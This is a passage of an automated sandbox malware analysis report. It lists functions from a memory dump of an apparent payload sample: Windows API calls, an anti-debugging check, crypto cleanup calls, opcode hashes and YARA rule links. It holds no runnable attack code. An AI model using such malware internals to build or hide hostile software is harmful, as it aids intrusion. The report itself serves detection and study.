                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: DebuggerPresent_memset
                                                                                                                            • String ID: i;H
                                                                                                                            • API String ID: 2328436684-4243722023
                                                                                                                            • Opcode ID: af219e2d4e02d6edc025ec930f8c08da150d6503fc9d49fd43e4e45dc1ac0cd4
                                                                                                                            • Instruction ID: 0e79145285b68e710057908b04055dfb15d4cd8771ec2ce8ba04f9cc06cecf7e
                                                                                                                            • Opcode Fuzzy Hash: af219e2d4e02d6edc025ec930f8c08da150d6503fc9d49fd43e4e45dc1ac0cd4
                                                                                                                            • Instruction Fuzzy Hash: 8931F77590122D9BCB21DF69D9887CDBBB8BF08310F1042EAE80CA6251E7349F858F48
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00471178 Relevance: 3.0, APIs: 2, Instructions: 19encryptionCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CryptDestroyHash.ADVAPI32(?), ref: 00471190
                                                                                                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 004711A0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Crypt$ContextDestroyHashRelease
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3989222877-0
                                                                                                                            • Opcode ID: a2198c037b9d5fbd1f47509a8581bf0db8f78a9d4ce44962567a5936cf5d4b0c
                                                                                                                            • Instruction ID: 20486c5ce6693c56f7c4a4c2b96f4fc641e9dcdaf97cb66c8a1d757f8d1dc20a
                                                                                                                            • Opcode Fuzzy Hash: a2198c037b9d5fbd1f47509a8581bf0db8f78a9d4ce44962567a5936cf5d4b0c
                                                                                                                            • Instruction Fuzzy Hash: FFE0EC74F0030597EF309A799C49FAF7AA8BF18745F848516FA05E6351D62CD801C665
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046EA51 Relevance: 3.0, APIs: 2, Instructions: 19encryptionCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CryptDestroyHash.ADVAPI32(?), ref: 0046EA69
                                                                                                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0046EA79
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Crypt$ContextDestroyHashRelease
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3989222877-0
                                                                                                                            • Opcode ID: 51ffdc68654c5d415ea20d1dc008e804feb07817255bda28a4cc8a4ffad52425
                                                                                                                            • Instruction ID: bbef1a9da0cc687f01965bcce626e60b9483a1f58b603ff5bb19955789607d97
                                                                                                                            • Opcode Fuzzy Hash: 51ffdc68654c5d415ea20d1dc008e804feb07817255bda28a4cc8a4ffad52425
                                                                                                                            • Instruction Fuzzy Hash: 00E0E2BCF0020597DF20DBB69C49B6F76E8BF15744B140429F805F2245EA2CE9058A2A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046EC68 Relevance: 3.0, APIs: 2, Instructions: 19encryptionCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CryptDestroyHash.ADVAPI32(?), ref: 0046EC80
                                                                                                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0046EC90
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Crypt$ContextDestroyHashRelease
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3989222877-0
                                                                                                                            • Opcode ID: a23f2caa626e0a6027c93bb8df86120388a71fbef345fd1b0b49a8b8ab5aecdd
                                                                                                                            • Instruction ID: d8ef9a5cc40fcb42a70e27f6dc7e448e69bc874ee7a3e4315cc3c141a4373e9f
                                                                                                                            • Opcode Fuzzy Hash: a23f2caa626e0a6027c93bb8df86120388a71fbef345fd1b0b49a8b8ab5aecdd
                                                                                                                            • Instruction Fuzzy Hash: 3AE0B6B8F0020597EF309E769D09F6F7AE86B14645B040415A901E2241E62CD8018666
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004929EC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00484266,?,?,?,00000001), ref: 004929F1
                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 004929FA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3192549508-0
                                                                                                                            • Opcode ID: ddc85cbd52342a857ac1c547525be3751b6ae7759d9af7bccb2a66b3da20584d
                                                                                                                            • Instruction ID: fd763f4a301f7ec8cff21866073ac02aa6b414f16baf632ad32116ca0dfb9875
                                                                                                                            • Opcode Fuzzy Hash: ddc85cbd52342a857ac1c547525be3751b6ae7759d9af7bccb2a66b3da20584d
                                                                                                                            • Instruction Fuzzy Hash: 45B09231044208ABDA502B91EC0BB8C3F28EFA6A62F004012F60D440638B625466EE91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004987C8 Relevance: 1.5, APIs: 1, Instructions: 20COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EnumSystemLocalesW.KERNEL32(004987B4,00000001,?,004976BC,0049775A,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 004987F6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumLocalesSystem
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2099609381-0
                                                                                                                            • Opcode ID: 7e8a8c932d3edbb6bee2b9d8b7c0d5b0a4a7c8656776c45f693858fed386ae3c
                                                                                                                            • Instruction ID: 6f47a8c102d45388a588c6796360735e68fe4f5536266ac3d2c8838577035046
                                                                                                                            • Opcode Fuzzy Hash: 7e8a8c932d3edbb6bee2b9d8b7c0d5b0a4a7c8656776c45f693858fed386ae3c
                                                                                                                            • Instruction Fuzzy Hash: CFE04F31150208BBDF21CF98EC46BA83BA5AB54710F100415F90C5A560C671A464EB48
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0049884E Relevance: 1.5, APIs: 1, Instructions: 18COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,20001004,?,0048580F,?,0048580F,?,20001004,?,00000002,?,00000004,?,00000000), ref: 00498875
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoLocale
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2299586839-0
                                                                                                                            • Opcode ID: 8dc918b2f3ea50646adffeeeddd052b9d2447cdee5a1169e61e9671bc8cdf2b9
                                                                                                                            • Instruction ID: 87028691e929cfccd2823cb85cd7b9111d2400c61f668679834e19270033e5e2
                                                                                                                            • Opcode Fuzzy Hash: 8dc918b2f3ea50646adffeeeddd052b9d2447cdee5a1169e61e9671bc8cdf2b9
                                                                                                                            • Instruction Fuzzy Hash: 9FD0173200010CFF8F01AFE5EC85C6E3F69FB09364B080409FA1C46521DA36E830EB65
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004929BB Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(?,?,00491DA6,00491D5B), ref: 004929C1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3192549508-0
                                                                                                                            • Opcode ID: 01702a6bf65c52a6eaef1a5d9e0a0b8440c4fcc35c0e5b45fa70eb2f58630ae4
                                                                                                                            • Instruction ID: f500cc41bb958c8a256553bb55ddda937819e8bd7619f043a44011203b9c4828
                                                                                                                            • Opcode Fuzzy Hash: 01702a6bf65c52a6eaef1a5d9e0a0b8440c4fcc35c0e5b45fa70eb2f58630ae4
                                                                                                                            • Instruction Fuzzy Hash: B9A0113000020CAB8A002B82EC0A8883F2CEAA22A0B008022F80C000228B22A822AA80
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004878D5 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetProcessHeap.KERNEL32(00483FED,00567990,00000014), ref: 004878D5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: HeapProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 54951025-0
                                                                                                                            • Opcode ID: d67d7ee009dcbabb2a8e80ee7b7bad6660657e3baccfbc0049fed6b144e37c35
                                                                                                                            • Instruction ID: 9413ee4d94a5f1858aefb818e693ed7270358558ba8a8df32920cfc54e08bf16
                                                                                                                            • Opcode Fuzzy Hash: d67d7ee009dcbabb2a8e80ee7b7bad6660657e3baccfbc0049fed6b144e37c35
                                                                                                                            • Instruction Fuzzy Hash: ABB012B0305102C74B180B387C1C00D39D47B18305310003DB00BC11A0EF30C464BA04
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00465457 Relevance: .7, Instructions: 723COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1a05a813b3a5314f5d94eccb013c4d6e564489a5e4c673b4c78b0529770dc8ec
                                                                                                                            • Instruction ID: 9be9c97bac054189e5169ee69763d34c5679e13f5b653268d411c7265170135d
                                                                                                                            • Opcode Fuzzy Hash: 1a05a813b3a5314f5d94eccb013c4d6e564489a5e4c673b4c78b0529770dc8ec
                                                                                                                            • Instruction Fuzzy Hash: 5B42AF71629F159BC3DADF24C88055BF3E1FFC8218F048A1DD99997A50DB38F819CA92
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00469686 Relevance: .5, Instructions: 478COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: bc7072257f75c4e919434387c3ab341a043509d4bf74f7f7152ca7795e320010
                                                                                                                            • Instruction ID: 5c0c0ce1b8f4b8adeddb9a0398400d7307e7ef6aac13d79aa1698facff0b0584
                                                                                                                            • Opcode Fuzzy Hash: bc7072257f75c4e919434387c3ab341a043509d4bf74f7f7152ca7795e320010
                                                                                                                            • Instruction Fuzzy Hash: EF22EFB6904B028FC714CF19D18055AF7E1FF88324F158A6EE8A9A7B10D734BA55CF86
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004621C0 Relevance: .4, Instructions: 443COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 91ba71904dea84e20fa54172000c9738ff60065219db22b0a49b9952a31d8242
                                                                                                                            • Instruction ID: 05d082330c416e67c06a532964af8df8e1104b9eb0c871c855bdc4d54a32604c
                                                                                                                            • Opcode Fuzzy Hash: 91ba71904dea84e20fa54172000c9738ff60065219db22b0a49b9952a31d8242
                                                                                                                            • Instruction Fuzzy Hash: CDF1B571344B058FC758DE5DDDA1B16F7E5AB88318F19C728919ACBB64E378F8068B80
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00462B80 Relevance: .4, Instructions: 427COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a55c1e803bf42f11cac576097dac1aa2b4bc5a7a4647751579d0c37334a4d9e9
                                                                                                                            • Instruction ID: 91ca3c909bc89278982c246957420f34f9ea19bc0c4bae71ab2b41aafe31d6aa
                                                                                                                            • Opcode Fuzzy Hash: a55c1e803bf42f11cac576097dac1aa2b4bc5a7a4647751579d0c37334a4d9e9
                                                                                                                            • Instruction Fuzzy Hash: 0F027E711187058FC756EE0CD49035AF3E1FFC8309F19892DD68987B64E73AAA198F86
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00468030 Relevance: .4, Instructions: 351COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0a5954790e41dc4624a9d46858f3452b98d53d0cd8c243c9cc9c775596d105f9
                                                                                                                            • Instruction ID: af0aa3335588ae6fabaab8c019c35e9a63c02610390f9e32c83e87573e416647
